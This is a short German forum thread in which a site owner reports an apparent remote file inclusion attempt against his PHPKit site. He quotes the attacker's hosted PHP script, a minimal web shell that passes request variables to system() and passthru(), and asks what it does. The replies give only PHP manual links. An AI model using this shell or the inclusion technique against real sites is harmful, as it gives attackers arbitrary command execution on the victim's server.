Frage zu einem externen Script

Einklappen
Dieses Thema ist geschlossen.
X
X
 
  • Filter
  • Zeit
  • Anzeigen
Alles löschen
neue Beiträge

  • Frage zu einem externen Script

    Hallöchen,

    heute hat jemand versucht, mit einem externen Script, auf meine Seite zuzugreifen.

    Und zwar verwende ich momentan noch PHPKit, als ich mir mal die momentanen Besucher angeschaut habe, sah ich, das dort folgender Eintrag war:

    http://www.fun-power-scripts.de/port...s.com/code.php

    Ich habe mir mal die Seite http://zonk.topcities.com/code.php aufgerufen und einen PHP Code vorgefunden:

    PHP-Code:
    <?
    echo ("START<BR>");
    system($com2);
    passthru($com);
    echo ("<BR>STOP");
    ?>
    Meine Frage nun: Was könnte dieser Code bewirken?

    Gruß
    Sven

  • #2
    www.php.net/echo
    www.php.net/system
    www.php.net/passthru

    Kommentar


    • #3
      Original geschrieben von penizillin
      www.php.net/echo
      www.php.net/system
      www.php.net/passthru
      So eine Antwort ist ja mal wieder richtig typisch für dieses Forum...ich werde mal meine Frage woanders stellen, wo ich auch eine Antwort bekomme und nicht nur irgendwelche Links...

      Kommentar

      Lädt...
      X